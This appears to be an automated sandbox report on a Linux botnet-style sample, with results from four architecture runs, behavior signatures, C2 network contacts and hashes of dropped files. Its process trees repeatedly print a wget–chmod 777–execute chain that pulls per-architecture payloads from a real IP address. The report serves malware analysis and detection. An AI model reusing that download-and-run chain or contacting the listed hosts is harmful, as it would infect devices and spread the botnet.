Analysis Overview
SHA256
d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0
Threat Level: Shows suspicious behavior
The file d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown was found to show suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
File and Directory Permissions Modification
Deletes itself
Unexpected DNS network traffic destination
Enumerates running processes
Reads process memory
Changes its process name
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-14 03:10
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 03:10
Reported
2024-11-14 03:13
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
0s
Max time network
134s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/earm | /tmp/earm | N/A |
| N/A | /tmp/earm5 | /tmp/earm5 | N/A |
| N/A | /tmp/earm7 | /tmp/earm7 | N/A |
| N/A | /tmp/emips | /tmp/emips | N/A |
| N/A | /tmp/empsl | /tmp/empsl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/emips | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/empsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/earm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/earm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/earm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/emips | /usr/bin/wget | N/A |
Processes
/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown
[/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown]
/bin/rm
[rm -rf earm]
/usr/bin/wget
[wget http://185.157.247.125/c/earm]
/bin/chmod
[chmod 777 earm]
/tmp/earm
[./earm asus]
/bin/rm
[rm -rf earm]
/bin/rm
[rm -rf earm5]
/usr/bin/wget
[wget http://185.157.247.125/c/earm5]
/bin/chmod
[chmod 777 earm5]
/tmp/earm5
[./earm5 asus]
/bin/rm
[rm -rf earm5]
/bin/rm
[rm -rf earm6]
/usr/bin/wget
[wget http://185.157.247.125/c/earm6]
/bin/chmod
[chmod 777 earm6]
/tmp/earm6
[./earm6 asus]
/bin/rm
[rm -rf earm6]
/bin/rm
[rm -rf earm7]
/usr/bin/wget
[wget http://185.157.247.125/c/earm7]
/bin/chmod
[chmod 777 earm7]
/tmp/earm7
[./earm7 asus]
/bin/rm
[rm -rf earm7]
/bin/rm
[rm -rf emips]
/usr/bin/wget
[wget http://185.157.247.125/c/emips]
/bin/chmod
[chmod 777 emips]
/tmp/emips
[./emips asus]
/bin/rm
[rm -rf emips]
/bin/rm
[rm -rf empsl]
/usr/bin/wget
[wget http://185.157.247.125/c/empsl]
/bin/chmod
[chmod 777 empsl]
/tmp/empsl
[./empsl asus]
/bin/rm
[rm -rf empsl]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| US | 151.101.129.91:443 | | tcp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| US | 151.101.129.91:443 | | tcp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| GB | 89.187.167.2:443 | | tcp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.38:443 | 1527653184.rsc.cdn77.org | tcp |
Files
/tmp/earm
| MD5 | 300cd530fb0a7f7cf6db875f68c0483e |
| SHA1 | a4bce294dc142fb1354e917bed4d58c98f381850 |
| SHA256 | a033de6c1fc62202ed6c97bd7cf05aba7afb13ca591083eaf39f0b30dc8d7885 |
| SHA512 | 656055bbcc49b7edeb1102887cfab16b4d425f8964433b0f08fd40e9ec63b7398661ecd73951031731f7c98ea8af8773b0e3d486c09f0eae977f4ab0862c66a1 |
/tmp/earm5
| MD5 | 17b0ebeb1226ffff541eb2551cc542ae |
| SHA1 | f08a0c96f0ec5df5e5de2f399ef319e514fa799e |
| SHA256 | 02f8431d1bf70570d5bd9cdebb3bdf457f3296d508139506767413b9b982b3c9 |
| SHA512 | 2692b1de8ecb7a8d5e95c8ea2ac423483f7c619fa624662fbe74f8949d2db0ee59a12ad5bd6d873e123fed97daea139bb94bb25d4f7c712a1bc55bc1a096f72a |
/tmp/earm7
| MD5 | 521069251bdce0fbd37497b8f527ab23 |
| SHA1 | 020730190edde76dec3de9678351aa6e65ab91bf |
| SHA256 | aa5db395352aff621bc290b0eb2f7715230f93556ac99cc056cd22a56a5adc72 |
| SHA512 | 09e176cdbcb48370c273ea4733d1c0c8f64625f2070ab7742b929268d5cb6bd97d091c884223777ccd0877209d65db1c8d56adaf3063d7fcfc9f44e127649f70 |
/tmp/emips
| MD5 | c0b34d8a59f793b636b5424b8e96a64a |
| SHA1 | d5eac6c7b3a5953ffcd642de9db2cd1c45463e96 |
| SHA256 | defb122644753c1493b140e9bb7b6df824197a475f39af66f50ae93190e43270 |
| SHA512 | 57446ac19971a42d6dc72b0ce14e7771efed16b9da6b86102ec4540cdc16103557e48eb957a822543d825cada502700d8f225d4b47d93c5e43e7fd8c55ba25d4 |
/tmp/empsl
| MD5 | 3cfc76868e26201ac03e0583b7c8aaba |
| SHA1 | 03436d9d090e1f944fecf60adc1e45f90df20c26 |
| SHA256 | 8c825ecd4fff08b44d8334e022dc0d6eedbe9a1b61469e523025d7968be2e84d |
| SHA512 | 84add49907a7c8818abc31118e16e8becf3bb41bcf814139fe0c99617b9ff46dc228be8a319e3fd80f0a672bc056cb30bb75ff0a4ed03418cd06cc95ef5070b2 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-14 03:10
Reported
2024-11-14 03:13
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/earm | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/earm | /tmp/earm | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 195.10.195.195 | N/A | N/A |
| Destination IP | 168.235.111.72 | N/A | N/A |
| Destination IP | 168.138.12.137 | N/A | N/A |
| Destination IP | 168.235.111.72 | N/A | N/A |
| Destination IP | 38.103.195.4 | N/A | N/A |
| Destination IP | 81.169.136.222 | N/A | N/A |
Enumerates running processes
Reads process memory
| Description | Indicator | Process | Target |
| File opened for reading | /proc/302/maps | /tmp/earm | N/A |
| File opened for reading | /proc/305/maps | /tmp/earm | N/A |
| File opened for reading | /proc/461/maps | /tmp/earm | N/A |
| File opened for reading | /proc/462/maps | /tmp/earm | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/earm | N/A |
Reads runtime system information
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/emips | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/earm | /usr/bin/wget | N/A |
Processes
/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown
[/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown]
/bin/rm
[rm -rf earm]
/usr/bin/wget
[wget http://185.157.247.125/c/earm]
/bin/chmod
[chmod 777 earm]
/tmp/earm
[./earm asus]
/bin/rm
[rm -rf earm]
/bin/rm
[rm -rf earm5]
/usr/bin/wget
[wget http://185.157.247.125/c/earm5]
/bin/chmod
[chmod 777 earm5]
/tmp/earm5
[./earm5 asus]
/bin/rm
[rm -rf earm5]
/bin/rm
[rm -rf earm6]
/usr/bin/wget
[wget http://185.157.247.125/c/earm6]
/bin/chmod
[chmod 777 earm6]
/tmp/earm6
[./earm6 asus]
/bin/rm
[rm -rf earm6]
/bin/rm
[rm -rf earm7]
/usr/bin/wget
[wget http://185.157.247.125/c/earm7]
/bin/chmod
[chmod 777 earm7]
/tmp/earm7
[./earm7 asus]
/bin/rm
[rm -rf earm7]
/bin/rm
[rm -rf emips]
/usr/bin/wget
[wget http://185.157.247.125/c/emips]
/bin/chmod
[chmod 777 emips]
/tmp/emips
[./emips asus]
/bin/rm
[rm -rf emips]
/bin/rm
[rm -rf empsl]
/usr/bin/wget
[wget http://185.157.247.125/c/empsl]
/bin/chmod
[chmod 777 empsl]
/tmp/empsl
[./empsl asus]
/bin/rm
[rm -rf empsl]
Network
| Country | Destination | Domain | Proto |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| US | 168.235.111.72:53 | trump2024.oss | udp |
| GB | 45.95.18.100:4096 | trump2024.oss | tcp |
| US | 146.71.81.108:4096 | trump2024.oss | tcp |
| US | 144.208.127.181:4096 | trump2024.oss | tcp |
| AU | 203.96.177.158:4096 | trump2024.oss | tcp |
| DE | 195.10.195.195:53 | liberalretard.libre | udp |
| US | 144.208.127.181:4096 | liberalretard.libre | tcp |
| US | 146.71.81.108:4096 | liberalretard.libre | tcp |
| AU | 203.96.177.158:4096 | liberalretard.libre | tcp |
| GB | 45.95.18.100:4096 | liberalretard.libre | tcp |
| AU | 168.138.12.137:53 | trump2024.oss | udp |
| US | 146.71.81.108:4096 | trump2024.oss | tcp |
| GB | 45.95.18.100:4096 | trump2024.oss | tcp |
| US | 144.208.127.181:4096 | trump2024.oss | tcp |
| AU | 203.96.177.158:4096 | trump2024.oss | tcp |
| US | 168.235.111.72:53 | trump2024.oss | udp |
| US | 144.208.127.181:4096 | trump2024.oss | tcp |
| US | 146.71.81.108:4096 | trump2024.oss | tcp |
| AU | 203.96.177.158:4096 | trump2024.oss | tcp |
| GB | 45.95.18.100:4096 | trump2024.oss | tcp |
| CA | 38.103.195.4:53 | liberalretard.libre | udp |
| US | 146.71.81.108:4096 | liberalretard.libre | tcp |
| GB | 45.95.18.100:4096 | liberalretard.libre | tcp |
| US | 144.208.127.181:4096 | liberalretard.libre | tcp |
| AU | 203.96.177.158:4096 | liberalretard.libre | tcp |
| DE | 81.169.136.222:53 | trump2024.oss | udp |
| US | 146.71.81.108:4096 | trump2024.oss | tcp |
| AU | 203.96.177.158:4096 | trump2024.oss | tcp |
| GB | 45.95.18.100:4096 | trump2024.oss | tcp |
| US | 144.208.127.181:4096 | trump2024.oss | tcp |
| US | 1.1.1.1:53 | xaiverbot.net | udp |
| AU | 203.96.177.158:4096 | xaiverbot.net | tcp |
| NL | 185.198.234.82:4096 | xaiverbot.net | tcp |
| US | 146.71.81.108:4096 | xaiverbot.net | tcp |
| US | 144.208.127.181:4096 | xaiverbot.net | tcp |
Files
/tmp/earm
| MD5 | 300cd530fb0a7f7cf6db875f68c0483e |
| SHA1 | a4bce294dc142fb1354e917bed4d58c98f381850 |
| SHA256 | a033de6c1fc62202ed6c97bd7cf05aba7afb13ca591083eaf39f0b30dc8d7885 |
| SHA512 | 656055bbcc49b7edeb1102887cfab16b4d425f8964433b0f08fd40e9ec63b7398661ecd73951031731f7c98ea8af8773b0e3d486c09f0eae977f4ab0862c66a1 |
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-14 03:10
Reported
2024-11-14 03:13
Platform
debian9-mipsbe-20240611-en
Max time kernel
150s
Max time network
151s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/emips | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/earm | /tmp/earm | N/A |
| N/A | /tmp/earm5 | /tmp/earm5 | N/A |
| N/A | /tmp/earm7 | /tmp/earm7 | N/A |
| N/A | /tmp/emips | /tmp/emips | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 138.197.140.189 | N/A | N/A |
| Destination IP | 51.77.149.139 | N/A | N/A |
| Destination IP | 9.9.9.9 | N/A | N/A |
| Destination IP | 162.243.19.47 | N/A | N/A |
Enumerates running processes
Reads process memory
| Description | Indicator | Process | Target |
| File opened for reading | /proc/383/maps | /tmp/emips | N/A |
| File opened for reading | /proc/385/maps | /tmp/emips | N/A |
| File opened for reading | /proc/679/maps | /tmp/emips | N/A |
| File opened for reading | /proc/680/maps | /tmp/emips | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/emips | N/A |
Reads runtime system information
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/emips | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/earm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/earm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/earm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/emips | /usr/bin/wget | N/A |
Processes
/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown
[/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown]
/bin/rm
[rm -rf earm]
/usr/bin/wget
[wget http://185.157.247.125/c/earm]
/bin/chmod
[chmod 777 earm]
/tmp/earm
[./earm asus]
/bin/rm
[rm -rf earm]
/bin/rm
[rm -rf earm5]
/usr/bin/wget
[wget http://185.157.247.125/c/earm5]
/bin/chmod
[chmod 777 earm5]
/tmp/earm5
[./earm5 asus]
/bin/rm
[rm -rf earm5]
/bin/rm
[rm -rf earm6]
/usr/bin/wget
[wget http://185.157.247.125/c/earm6]
/bin/chmod
[chmod 777 earm6]
/tmp/earm6
[./earm6 asus]
/bin/rm
[rm -rf earm6]
/bin/rm
[rm -rf earm7]
/usr/bin/wget
[wget http://185.157.247.125/c/earm7]
/bin/chmod
[chmod 777 earm7]
/tmp/earm7
[./earm7 asus]
/bin/rm
[rm -rf earm7]
/bin/rm
[rm -rf emips]
/usr/bin/wget
[wget http://185.157.247.125/c/emips]
/bin/chmod
[chmod 777 emips]
/tmp/emips
[./emips asus]
/bin/rm
[rm -rf emips]
/bin/rm
[rm -rf empsl]
/usr/bin/wget
[wget http://185.157.247.125/c/empsl]
/bin/chmod
[chmod 777 empsl]
/tmp/empsl
[./empsl asus]
/bin/rm
[rm -rf empsl]
Network
| Country | Destination | Domain | Proto |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| FR | 185.157.247.125:80 | 185.157.247.125 | tcp |
| US | 162.243.19.47:53 | liberalretard.libre | udp |
| US | 144.208.127.181:4096 | liberalretard.libre | tcp |
| AU | 203.96.177.158:4096 | liberalretard.libre | tcp |
| GB | 45.95.18.100:4096 | liberalretard.libre | tcp |
| US | 146.71.81.108:4096 | liberalretard.libre | tcp |
| CA | 138.197.140.189:53 | liberalretard.libre | udp |
| US | 146.71.81.108:4096 | liberalretard.libre | tcp |
| GB | 45.95.18.100:4096 | liberalretard.libre | tcp |
| US | 144.208.127.181:4096 | liberalretard.libre | tcp |
| AU | 203.96.177.158:4096 | liberalretard.libre | tcp |
| CH | 9.9.9.9:53 | xaiverbot.net | udp |
| US | 144.208.127.181:4096 | xaiverbot.net | tcp |
| AU | 203.96.177.158:4096 | xaiverbot.net | tcp |
| NL | 185.198.234.82:4096 | xaiverbot.net | tcp |
| GB | 45.95.18.100:4096 | xaiverbot.net | tcp |
| US | 146.71.81.108:4096 | xaiverbot.net | tcp |
| FR | 51.77.149.139:53 | trump2024.oss | udp |
| US | 144.208.127.181:4096 | trump2024.oss | tcp |
| AU | 203.96.177.158:4096 | trump2024.oss | tcp |
| GB | 45.95.18.100:4096 | trump2024.oss | tcp |
| US | 146.71.81.108:4096 | trump2024.oss | tcp |
Files
/tmp/earm
| MD5 | 300cd530fb0a7f7cf6db875f68c0483e |
| SHA1 | a4bce294dc142fb1354e917bed4d58c98f381850 |
| SHA256 | a033de6c1fc62202ed6c97bd7cf05aba7afb13ca591083eaf39f0b30dc8d7885 |
| SHA512 | 656055bbcc49b7edeb1102887cfab16b4d425f8964433b0f08fd40e9ec63b7398661ecd73951031731f7c98ea8af8773b0e3d486c09f0eae977f4ab0862c66a1 |
/tmp/earm5
| MD5 | 17b0ebeb1226ffff541eb2551cc542ae |
| SHA1 | f08a0c96f0ec5df5e5de2f399ef319e514fa799e |
| SHA256 | 02f8431d1bf70570d5bd9cdebb3bdf457f3296d508139506767413b9b982b3c9 |
| SHA512 | 2692b1de8ecb7a8d5e95c8ea2ac423483f7c619fa624662fbe74f8949d2db0ee59a12ad5bd6d873e123fed97daea139bb94bb25d4f7c712a1bc55bc1a096f72a |
/tmp/earm7
| MD5 | 521069251bdce0fbd37497b8f527ab23 |
| SHA1 | 020730190edde76dec3de9678351aa6e65ab91bf |
| SHA256 | aa5db395352aff621bc290b0eb2f7715230f93556ac99cc056cd22a56a5adc72 |
| SHA512 | 09e176cdbcb48370c273ea4733d1c0c8f64625f2070ab7742b929268d5cb6bd97d091c884223777ccd0877209d65db1c8d56adaf3063d7fcfc9f44e127649f70 |
/tmp/emips
| MD5 | c0b34d8a59f793b636b5424b8e96a64a |
| SHA1 | d5eac6c7b3a5953ffcd642de9db2cd1c45463e96 |
| SHA256 | defb122644753c1493b140e9bb7b6df824197a475f39af66f50ae93190e43270 |
| SHA512 | 57446ac19971a42d6dc72b0ce14e7771efed16b9da6b86102ec4540cdc16103557e48eb957a822543d825cada502700d8f225d4b47d93c5e43e7fd8c55ba25d4 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-14 03:10
Reported
2024-11-14 03:13
Platform
debian9-mipsel-20240611-en
Max time kernel
141s
Max time network
142s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/empsl | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/earm | /tmp/earm | N/A |
| N/A | /tmp/earm5 | /tmp/earm5 | N/A |
| N/A | /tmp/earm7 | /tmp/earm7 | N/A |
| N/A | /tmp/emips | /tmp/emips | N/A |
| N/A | /tmp/empsl | /tmp/empsl | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 103.1.206.179 | N/A | N/A |
| Destination IP | 9.9.9.9 | N/A | N/A |
| Destination IP | 162.243.19.47 | N/A | N/A |
| Destination IP | 208.67.222.222 | N/A | N/A |
Enumerates running processes
Reads process memory
| Description | Indicator | Process | Target |
| File opened for reading | /proc/668/maps | /tmp/empsl | N/A |
| File opened for reading | /proc/669/maps | /tmp/empsl | N/A |
| File opened for reading | /proc/370/maps | /tmp/empsl | N/A |
| File opened for reading | /proc/371/maps | /tmp/empsl | N/A |
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | N/A | /tmp/empsl | N/A |
Reads runtime system information
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /tmp/emips | N/A |
| N/A | N/A | /bin/rm | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/earm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/earm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/emips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/empsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/earm | /usr/bin/wget | N/A |
Processes
/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown
[/tmp/d7d6e8d2a8a990cf44e29244062ec6802e39c8b2c047f0367f23ae89415accf0.unknown]
/bin/rm
[rm -rf earm]
/usr/bin/wget
[wget http://185.157.247.125/c/earm]
/bin/chmod
[chmod 777 earm]
/tmp/earm
[./earm asus]
/bin/rm
[rm -rf earm]
/bin/rm
[rm -rf earm5]
/usr/bin/wget
[wget http://185.157.247.125/c/earm5]
/bin/chmod
[chmod 777 earm5]
/tmp/earm5
[./earm5 asus]
/bin/rm
[rm -rf earm5]
/bin/rm
[rm -rf earm6]
/usr/bin/wget
[wget http://185.157.247.125/c/earm6]
/bin/chmod
[chmod 777 earm6]
/tmp/earm6
[./earm6 asus]
/bin/rm
[rm -rf earm6]
/bin/rm
[rm -rf earm7]
/usr/bin/wget
[wget http://185.157.247.125/c/earm7]
/bin/chmod
[chmod 777 earm7]
/tmp/earm7
[./earm7 asus]
/bin/rm
[rm -rf earm7]
/bin/rm
[rm -rf emips]
/usr/bin/wget
[wget http://185.157.247.125/c/emips]
/bin/chmod
[chmod 777 emips]
/tmp/emips
[./emips asus]
/bin/rm
[rm -rf emips]
/bin/rm
[rm -rf empsl]
/usr/bin/wget
[wget http://185.157.247.125/c/empsl]
/bin/chmod
[chmod 777 empsl]
/tmp/empsl
[./empsl asus]
/bin/rm
[rm -rf empsl]
Network
| Country | Destination | Domain | Proto |
Files
/tmp/earm
/tmp/earm5
/tmp/earm7
/tmp/emips
/tmp/empsl